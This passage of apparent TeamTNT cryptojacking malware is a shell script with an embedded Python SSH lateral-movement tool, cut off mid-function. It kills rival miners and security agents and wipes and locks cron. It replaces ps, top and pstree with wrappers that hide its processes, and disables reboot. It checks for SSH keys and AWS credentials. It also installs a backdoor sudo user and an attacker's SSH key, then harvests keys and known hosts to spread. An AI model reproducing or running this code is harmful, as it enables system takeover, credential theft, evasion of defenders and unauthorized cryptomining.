/tmp/redis2 echo 1 > /tmp/redis2 chattr +i /tmp/redis2 chattr -ia /.Xll/xr >/.Xll/xr chattr +ia /.Xll/xr chattr -ia /etc/trace >/etc/trace chattr +ia /etc/trace chattr -ia /etc/newsvc.sh chattr -ia /etc/svc* chattr -ia /tmp/newsvc.sh chattr -ia /tmp/svc* >/etc/newsvc.sh >/etc/svcupdate >/etc/svcguard >/etc/svcworkmanager >/etc/svcupdates >/tmp/newsvc.sh >/tmp/svcupdate >/tmp/svcguard >/tmp/svcworkmanager >/tmp/svcupdates chattr +ia /etc/newsvc.sh chattr +ia /etc/svc* chattr +ia /tmp/newsvc.sh chattr +ia /tmp/svc* sleep 1 chattr -ia /etc/phpupdate chattr -ia /etc/phpguard chattr -ia /etc/networkmanager chattr -ia /etc/newdat.sh >/etc/phpupdate >/etc/phpguard >/etc/networkmanager >/etc/newdat.sh chattr +ia /etc/phpupdate chattr +ia /etc/phpguard chattr +ia /etc/networkmanager chattr +ia /etc/newdat.sh chattr -ia /etc/zzh chattr -ia /etc/newinit >/etc/zzh >/etc/newinit chattr +ia /etc/zzh chattr +ia /etc/newinit sleep 1 chattr -i /usr/lib/systemd/systemd-update-daily echo 1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill % docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f % #echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 % rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab } kill_miner_prockill_sus_proc() {ps axf -o "pid"|while read prociddols -l /proc/$procid/exe | grep /tmpif [ $? -ne 1 ]thencat /proc/$procid/cmdline| grep -a -E "crypto"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fifidoneps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read prociddocat /proc/$procid/cmdline| grep -a -E "crypto"if [ $? -ne 0 ]thenkill -9 $procidelseecho "don't kill"fidone } kill_sus_proc#FixTheSystemfunction SetupNameServers(){ grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null }SetupNameServerschattr -iR /var/spool/cron/ tntrecht -iR /var/spool/cron/ crontab -rfunction clean_cron(){ chattr -R -ia /var/spool/cron tntrecht -R -ia /var/spool/cron chattr -ia /etc/crontab tntrecht -ia /etc/crontab chattr -R -ia /etc/cron.d tntrecht -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs tntrecht -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab }clean_cronfunction lock_cron() {chattr -R +ia /var/spool/crontntrecht -R +ia /var/spool/crontouch /etc/crontabchattr +ia /etc/crontabtntrecht +ia /etc/crontabchattr -R +ia /var/spool/cron/crontabstntrecht -R +ia /var/spool/cron/crontabschattr -R +ia /etc/cron.dtntrecht -R +ia /etc/cron.d }lock_cronfunction CheckAboutSomeKeys(){if [ -f "/root/.ssh/id_rsa" ]thenecho 'found: /root/.ssh/id_rsa'fiif [ -f "/home/*/.ssh/id_rsa" ]thenecho 'found: /home/*/.ssh/id_rsa'fiif [ -f "/root/.aws/credentials" ]thenecho 'found: /root/.aws/credentials'fiif [ -f "/home/*/.aws/credentials" ]thenecho 'found: /home/*/.aws/credentials'fi }CheckAboutSomeKeysif [ -f "/usr/bin/TeamTNT/[crypto]" ] then service crypto stop rm -fr /usr/bin/TeamTNT/ fifunction SecureTheSystem(){ echo "begin SecureTheSystem"if [ -f "/bin/ps.original" ]thenecho "/bin/ps changed"elsemv /bin/ps /bin/ps.original echo "#! /bin/bash">>/bin/psecho "ps.original \$@ | grep -v \"crypto\|scan\"">>/bin/pschmod +x /bin/pstouch -d 20160825 /bin/psecho "/bin/ps changing"fiif [ -f "/bin/top.original" ]thenecho "/bin/top changed"elsemv /bin/top /bin/top.original echo "#! /bin/bash">>/bin/topecho "top.original \$@ | grep -v \"crypto\|scan\"">>/bin/topchmod +x /bin/toptouch -d 20160825 /bin/topecho "/bin/top changing"fiif [ -f "/bin/pstree.original" ]thenecho "/bin/pstree changed"elsemv /bin/pstree /bin/pstree.originalecho "#! /bin/bash">>/bin/pstreeecho "pstree.original \$@ | grep -v \"crypto\|scan\"">>/bin/pstreechmod +x /bin/pstreetouch -d 20160825 /bin/pstreeecho "/bin/pstree changing"fiif [ -f "/bin/chattr" ]thenchattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`if [ "$chattrsize" -lt "$chattr_size" ]thenyum -y remove e2fsprogsyum -y install e2fsprogselseecho "no need install chattr"fielseyum -y remove e2fsprogsyum -y install e2fsprogsfi }function LockDownTheSystem(){ LOCKDOWNARRAY=(shutdown reboot poweroff telinit) for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null #chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null donechattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/nullLOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service") for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; dochattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null > $LOCKDOWNFILE rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null done}function KILLMININGSERVICES(){echo "[*] Removing previous miner (if any)" if sudo -n true 2>/dev/null; thensudo systemctl stop crypto.service fi killall -9 xmrig echo "do KILLMININGSERVICES"$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null) #$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null killall -9 docker-update 2>/dev/null 1>/dev/nullrm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null killall -9 redis-backup 2>/dev/null 1>/dev/nullrm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null killall -9 xmrig 2>/dev/null 1>/dev/nullLOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='if [ ! -f /usr/bin/tntrecht ]; then chattrbin=`which chattr` cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null chmod -x $chattrbin 2>/dev/null 1>/dev/null tntrecht +i $chattrbin 2>/dev/null 1>/dev/null fiLOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='if [ -f /root/.tmp/xmrig ]; then chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig") for tmpxmrigfile in ${tmpxmrig[@]}; do rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null echo $LOCKFILE | base64 -d > $tmpxmrigfile chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null killall $tmpxmrigfile 2>/dev/null 1>/dev/null chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null ps ax| grep xmrig 2>/dev/null 1>/dev/null done fiif [ -f /usr/sbin/cpumon ]; then cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu") for cpumonfile in ${cpumonxmr[@]}; do chattr -i $cpumonfile 2>/dev/null 1>/dev/null tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null rm -f $cpumonfile 2>/dev/null 1>/dev/null pkill -f $cpumonfile 2>/dev/null 1>/dev/null kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null echo $LOCKFILE | base64 -d > $cpumonfile chmod +x $cpumonfile 2>/dev/null 1>/dev/null chattr +i $cpumonfile 2>/dev/null 1>/dev/null tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null pkill -f $cpumonfile 2>/dev/null 1>/dev/null kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null killall $cpumonfile 2>/dev/null 1>/dev/null done fiif [ -f /opt/server ]; then chattr -i /opt/server 2>/dev/null 1>/dev/null tntrecht -i /opt/server 2>/dev/null 1>/dev/null rm -f /opt/server 2>/dev/null 1>/dev/null pkill -f /opt/server 2>/dev/null 1>/dev/null kill $(pidof /opt/server) 2>/dev/null 1>/dev/null fiif [ -f /tmp/log_rotari ]; then chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null fiBASH00=$(ps ax | grep -v grep | grep "/root/.tmp00/bash") if [ ! -z "$BASH00" ]; then chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash" | awk '{print $1}') 2>/dev/null 1>/dev/null kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null echo " " > /root/.tmp00/bash 2>/dev/null 1>/dev/null rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null echo $StringToLock > /root/.tmp00/bash chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null tntrecht +i /root/.tmp00/bash 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fiBASH6400=$(ps ax | grep -v grep | grep "/root/.tmp00/bash64") if [ ! -z "$BASH6400" ]; then chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null chattr -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null tntrecht -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null chmod -x /root/.tmp00/bash64 2>/dev/null 1>/dev/null pkill -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash64" | awk '{print $1}') 2>/dev/null 1>/dev/null kill $(pidof /root/.tmp00/bash64) 2>/dev/null 1>/dev/null echo " " > /root/.tmp00/bash64 2>/dev/null 1>/dev/null rm -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null echo $StringToLock > /root/.tmp00/bash64 chattr +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null tntrecht +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fiKINSING1=$(ps ax | grep -v grep | grep "/var/tmp/kinsing") if [ ! -z "$KINSING1" ]; then chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null tntrecht -i /var/tmp/kinsing 2>/dev/null 1>/dev/null chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null echo $StringToLock > /var/tmp/kinsing chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null tntrecht +i /var/tmp/kinsing 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fiKINSING2=$(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi") if [ ! -z "$KINSING2" ]; then chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null tntrecht -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null echo $StringToLock > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fikill $(ps aux | grep -vw crypto | grep -v grep |grep -v scan | grep -vw "/usr/bin/xmrigMiner" | grep -vw "./shell" | awk '{if($3>40.0) print $2}')}function makesshaxx(){ echo "begin makessh" RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver" grep -q hilde /etc/passwd || chattr -ia /etc/passwd; grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd; grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd grep -q hilde /etc/shadow || chattr -ia /etc/shadow; grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow; grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers; grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers; grep -q hilde /etc/sudoers || echo 'hilde ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoersmkdir /home/hilde/.ssh/ -p touch /home/hilde/.ssh/authorized_keys touch /home/hilde/.ssh/authorized_keys2 chmod 600 /home/hilde/.ssh/authorized_keys chmod 600 /home/hilde/.ssh/authorized_keys2 grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys; grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys; grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys; grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2; grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2; grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2; mkdir /root/.ssh/ -p touch /root/.ssh/authorized_keys touch /root/.ssh/authorized_keys2 chmod 600 /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys2 grep -q root@puppetserver /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys; grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys; grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys grep -q root@puppetserver /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2; grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2; grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2 }function CreateSshPunker(){ if [ ! -f "/usr/bin/pu"] then echo '#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#             |
#          \   |   /
#     .     \  |  /    .
#      `-.__|\/_\/|_.-'
#    .__  \ /     `./  
#       `-        @|
#      .-'`.  !!    -   punk.py - unix SSH post-exploitation 1337 tool
#     '     `  !  __.'  Copyright (C) 2018 < Giuseppe `r3vn` Corti >
#           _)___(      https://xfiltrated.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import os
import sys
import threading
import argparse
import base64
import hashlib
import re
import socket
import struct
import hmac
import binascii

try: 
    import queue as queue
except ImportError:
    import Queue as queue


homesBlacklist = ["/dev/null","/var/empty","/bin","/sbin"]
shellBlacklist = ["/sbin/nologin","/bin/false","/usr/sbin/nologin","/bin/sync"]
knownHosts     = []
success        = []
users          = []
sshKeys        = []

   
class SSHThread(threading.Thread) :
 
	def __init__(self, q, tid, credentials, CMD="") :
		threading.Thread.__init__(self)
		self.queue = q
		self.tid = tid
		self.credentials = credentials
 
	def run(self) :
		while True :
			host = None 
			try :
				host = self.queue.get(timeout=1)
 
			except 	queue.Empty :
				return
 
			
			for user in users:
				for keys in sshKeys:
					try:
						if int(os.system("ssh -oBatchMode=yes -oStrictHostKeyChecking=no -oPasswordAuthentication=no -oConnectTimeout=8 %s@%s -i %s -q exit" % (user,host,key ))) == 0:
							self.credentials.put(user+":"+host+":"+key)

							if user+":"+host+":"+key not in success:
								sys.stdout.write ("\033[92m[*]\033[0m Got \033[92m%s@%s\033[0m with \033[92m\"%s\"\033[0m key.\n" % (user,host,key))
								success.append(user+":"+host+":"+key)
							
							if CMD != '':
								sys.stdout.write ("\033[92m[*]\033[0m Executing \033[92m%s\033[0m.\n" % (CMD))
								os.system("ssh -oBatchMode=yes -oStrictHostKeyChecking=no -oPasswordAuthentication=no -oConnectTimeout=8 %s@%s -i %s -q -t \"%s\" " % (user,host,key,CMD))
					except:
						pass
 
 
			self.queue.task_done()


class CrackThread(threading.Thread) :
 
	def __init__(self, q, tid, ips, magic, salt, hashed) :
		threading.Thread.__init__(self)
		self.queue  = q
		self.tid    = tid
		self.ips    = ips
		self.magic  = magic
		self.salt   = base64.b64decode(salt)
		self.hashed = hashed

 
	def run(self) :
		while True :
			host = None 
			try :
				ip_try = self.queue.get(timeout=1)
 
			except 	queue.Empty :
				return


			h = hmac.new(self.salt, msg=ip_try.encode(), digestmod=hashlib.sha1) # FIXME
			ip_hash = base64.b64encode(h.digest()).decode()


			if ip_hash == self.hashed:
				knownHosts.append(ip_try)
				sys.stdout.write ("\033[92m[*]\033[0m Found \033[92m%s\033[0m\n" % (ip_try))

			#sys.stdout.write ("\n-----\nip: "+ip_try+"\n salt: "+self.salt.decode()+"\n output: "+ip_hash+"\ntarget: "+self.hashed)

			self.queue.task_done()


class attack(object):

	def __init__(self, cmd, threads):
		self.cmd = cmd
		self.threads = threads

	def run(self):

		q           = queue.Queue()
		credentials = queue.Queue()

		threads = []
		for i in range(1, self.threads) : # Number of threads
			worker = SSHThread(q, i, credentials, self.cmd) 
			worker.setDaemon(True)
			worker.start()
			threads.append(worker)

		for host in knownHosts:
			q.put(host)

		q.join()
		 
		# wait for all threads to exit 
		if not credentials.empty():
			out = (credentials.get()).split(":")
		else:
			return False
		 
		for item in threads :
			item.join()

		return out[0], out[1] # Output attack: user, host





class crack_host(object):

	def __init__(self, host_string, subnet, threads):
		""" crack an encrypted known host """

		self.magic   = host_string.split("|")[1]
		self.salt    = host_string.split("|")[2]
		self.hashed  = host_string.split("|")[3].split(" ")[0]
		self.subnet  = subnet # TODO
		self.threads = threads

	def run(self):

		q           = queue.Queue()
		ips         = queue.Queue()

		threads = []
		for i in range(1, self.threads) : # Number of threads
			worker = CrackThread(q, i, ips, self.magic, self.salt, self.hashed) 
			worker.setDaemon(True)
			worker.start()
			threads.append(worker)

		for host in ipv4_range(self.subnet): # TODO
			q.put(str(host))              # TODO

		q.join()
		 
		# wait for all threads to exit 
		if not ips.empty():
			out = (ips.get()).split(":")
		else:
			return False
		 
		for item in threads :
			item.join()

		return out[0], out[1] # Output attack: user, host

def discovery(args):
	# Search users, SSH keys and known hosts

	if args.passwd:
		# Get users and home paths from passwd
		F = open("/etc/passwd",'r')

		for line in F:
			if not line.startswith('#'): # skip comments

				user  = line.split(":")[0]
				home  = line.split(":")[5]
				shell = line.split(":")[6].replace("\n","")

				if home not in homesBlacklist and shell not in shellBlacklist:

					users.append(user)

					#collect known hosts
					if os.path.isfile(home + "/.ssh/known_hosts"):
						FK = open(home + "/.ssh/known_hosts")
						encrypted_knownhosts = False

						for host in FK:
							if not host.find("|") >= 0: # secure known_hosts
								if host.find(",") >= 0:
									hostname = host.split(" ")[0].split(",")[1]
								else:
									hostname = host.split(" ")[0]
								if hostname not in knownHosts:
									knownHosts.append(hostname)
							else:
								encrypted_knownhosts = True
									

						if encrypted_knownhosts and args.crack == "":
							sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % home )
							sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m--crack\033[0m flag to break it\n")

						elif encrypted_knownhosts and args.crack != "":
							# crack the hashed known hosts
							sys.stdout.write ("\033[92m[*]\033[0m Cracking known hosts on \033[92m%s/.ssh/known_hosts...\033[0m\n" % home )
							FK = open(home + "/.ssh/known_hosts")
							for host in FK:
								if host.find("|") >= 0:
									crack_obj = crack_host(host, args.crack, args.threads)
									crack_obj.run()
							#sys.stdout.write ("\033[92m[*]\033[0m Cracking done.\n")

						FK.close()

					# check users with private keys
					if os.path.isfile(home + "/.ssh/id_rsa"): 
						#targets[user]=home + "/.ssh/id_rsa"  # username and home dir
						if home+"/.ssh/id_rsa" not in sshKeys:
							sshKeys.append(home + "/.ssh/id_rsa")
		F.close()

	# home directory scan
	for homes in os.listdir(args.home):
		if homes not in users:

			users.append(homes)

			if os.path.isfile(args.home+homes + "/.ssh/id_rsa"):
				#targets[homes] = homes + "/.ssh/id_rsa"
				if args.home+homes + "/.ssh/id_rsa" not in sshKeys:
					sshKeys.append(args.home+homes + "/.ssh/id_rsa")

			if os.path.isfile(args.home+homes + "/.ssh/known_hosts"):
				FK = open(args.home+homes + "/.ssh/known_hosts")
				encrypted_knownhosts = False

				for host in FK:
					if not host.find("|") >= 0: # secure known_hosts
						if host.find(",") >= 0:
							hostname = host.split(" ")[0].split(",")[1]
						else:
							hostname = host.split(" ")[0]
						if hostname not in knownHosts:
							knownHosts.append(hostname)
					else:
						encrypted_knownhosts = True


				if encrypted_knownhosts and args.crack == "":
					sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % args.home )
					sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m%s--crack\033[0m flag to break it\n")

				elif encrypted_knownhosts and args.crack != "":
					# crack the hashed known hosts
					sys.stdout.write ("\033[92m[*]\033[0m Cracking known hosts on \033[92m%s/.ssh/known_hosts...\033[0m\n" % args.home )
					open(args.home+homes + "/.ssh/known_hosts")
					for host in FK:
						if host.find("|") >= 0:
							crack_obj = crack_host(host, args.crack, args.threads)
							crack_obj.run()

				FK.close()
	
	return True

# Avoid ipaddress library since is not supported in python2 
# https://stackoverflow.com/a/41386874
def inet_atoi(ipv4_str):
